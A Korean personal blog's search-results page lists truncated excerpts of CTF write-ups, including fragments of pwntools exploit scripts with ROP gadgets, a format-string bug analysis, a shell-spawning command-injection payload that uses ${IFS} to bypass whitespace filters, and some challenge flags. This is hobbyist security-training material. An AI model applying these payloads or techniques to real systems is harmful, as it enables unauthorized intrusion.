Mineta's Space

CTF 검색 결과

해당 글 19건

TetCTF 2021

이상한 CTF 하느라 대회 기간에는 참여를 못했고, 대회가 끝나고 나서 몇몇 문제들을 풀어봤다. PWNABLE :: warmup 주어진 라이브러리의 BuildID에서 실행 환경이 Linux Ubuntu 16.04임을 알 수 있다. 바이너리를 쭉 살펴보면 FSB가 발생하는 곳이 한 군데 보인다. void __fastcall print_fsb(const char *msg) { int i; // [rsp+1Ch] [rbp-4h] printf(msg); for ( i = strlen(msg); i 0x55708db2b270 ('*' ) 0008| 0x7fff4cea23c8 --> 0x55708e2ed428 ("whatzefuk???") 0016| 0x7fff4cea23d0 --> 0x0 0024| 0x7fff4..

CTF/CTF Playground 2021. 1. 9. 04:31

Brixel CTF winter edition

Programming :: Are you fast enough? 화면에 나오는 랜덤 문자열을 form에 넣어서 POST로 빨리 보내주면 된다. Python으로 파싱하는게 편했겠지만 NodeJS 연습해보기 위해 아래와 같이 코드를 썼다. 서버가 느려서 플래그 가져오는 것도 여러번 시도해야 했다. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 const request = require('request'); const cheerio = require('cheerio'); const URL = 'http://timesink.be/speedy/index.php'; var cookieJar = request.ja..

CTF/CTF Playground 2021. 1. 6. 17:55

IJCTF 2020

Pwn :: Admin 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 from pwn import * from time import sleep import argparse def exploit() : pop_rdi_ret = 0x400686 pop_rsi_ret = 0x410193 pop_rdx_ret = 0x44BCC6 pop_rax_ret = 0x415544 syscall_ret = 0x474D15 write_area = 0x6BCC00 payload..

CTF/CTF Playground 2020. 4. 27. 05:01

Houseplant CTF

Beginners :: Beginner 1 BASE64 decode Flag: rtcp{youre_very_welcome} Beginners :: Beginner 2 ASCII conversion Flag: rtcp{bob_you_suck_at_being_encouraging} Beginners :: Beginner 3 ASCII conversion (octal) Flag: rtcp{sue_me_i_didnt_know_what_octal_was_okay?!} Beginners :: Beginner 4 Caesar cipher, key=13 Flag: rtcp{yall_better_participate} Beginners :: Beginner 5 Morse code Flag: rtcp{MANY_BEEPS_..

CTF/CTF Playground 2020. 4. 27. 01:02

TAMUctf 2020

PWN :: BBPWN 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import * import argparse parser = argparse.ArgumentParser() parser.add_argument('-r', '--remote', help='connect to remote server', action='store_true') args = parser.parse_args() if args.remote : p = connect('challenges.tamuctf.com', 4252) else : p = process('./bbpwn') def exploit() : payload = b'A'*0x20 payload..

CTF/CTF Playground 2020. 3. 30. 10:34

Securinets Prequals 2K20

PWN :: UNCRACKABLE 약간 난이도 있는 Command Injection 문제다. 입력의 MD5 해시값이 3b9aafa12aceeccd29a154766194a964와 같으면 플래그를 보여준다. 입력을 scanf로 받기 때문에 whitespace, newline 등을 사용할 수 없고 sprintf로 커맨드라인에 입력값을 쓰기 때문에 NULL byte injection조차 불가능하다. 또 입력 길이가 32글자로 제한되어 있기 때문에 바로 echo로 해시값 3b... 을 쓰는 방법은 불가능하다. 수 차례 시도 끝에, 먼저 쉘로 들어가 echo를 사용해 길이 제한을 무력화했고, 공백은 ${IFS}를 사용해 우회했다. 최종 payload는 아래와 같다. ';echo${IFS}$(/bin/sh)|cat;..

CTF/CTF Playground 2020. 3. 23. 01:28

riftCTF

반 년 동안 했던 CTF 중 가장 열받는 CTF였다. 하다가 짜증나서 때려치운다. 이전에 했던 CTF들이 어떤 문제점들을 1개씩 갖고 있었다면 이 CTF는 그 모든 문제점들을 한 데 모아 때려박은 것 같다. 1. 웹 latency 10분 이상 2. 일관적이지 않은 플래그 형식 3. Not user-friendly 한 UI 구성 4. (개인적으로 맘에 안드는) 문제 유형들 이 CTF는 CTFd 프레임워크를 사용한다. 설정을 잘못한 건지 문제 로딩, 플래그 제출 등 모든 요청에 대해 서버 응답이 짧게는 2분에서 길게는 30분 뒤에 온다. 두 번째 문제인 비일관적인 플래그 형식은 이 느린 연결 속도와 합쳐져서 환장환상적인 사용자 경험을 제공한다. 문제 페이지에서는 줄바꿈을 그대로 LF로 넣어버려서 읽기가 불편..

CTF/CTF Playground 2020. 3. 21. 05:01

ångstromCTF 2020

Binary :: No Canary gets(name); 에서 취약점이 발생한다. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import * import argparse parser = argparse.ArgumentParser() parser.add_argument('-r', '--remote', help='connect to remote server', action='store_true') args = parser.parse_args() if args.remote : p = connect('shell.actf.co', 20700) else : p = process('./no_canary') def exploit() ..

CTF/CTF Playground 2020. 3. 16. 04:48

HackTM CTF 2020

crypto :: RSA is easy #1 주어진 소스를 보면, 평문 전체가 아닌 글자 하나에 대해서 pow 연산을 한다. 공개키가 주어져 있으니 printable 한 글자에 대해서 암호화를 진행한 다음 같은 값을 찾아서 하나씩 가져오면 된다. 1 2 3 4 5 6 7 8 9 N = 2815097054790191301990182436439049705360085636983932161799670060613055386204137836901877900375243335688911852633232907405472861320940703708932080989834395315793521108613501043628380589189363687099141123630790165069622149179047063522507625..

CTF/CTF Playground 2020. 2. 2. 00:59

Rice Tea Cat Panda #cat-chat

wait wait what the heck is going on here!!!! Vihan: basic research is what you do when you dont know what you are doing. Jessica: if you can keep your head while all about you are losing theirs thenyou obviously dont understand whats going on. Tida: by working faithfully 8 hours a day you may eventually get to be aboss and work 12 hours a day. Jess: every society professes the existence of inali..

CTF/CTF Playground 2020. 1. 24. 22:49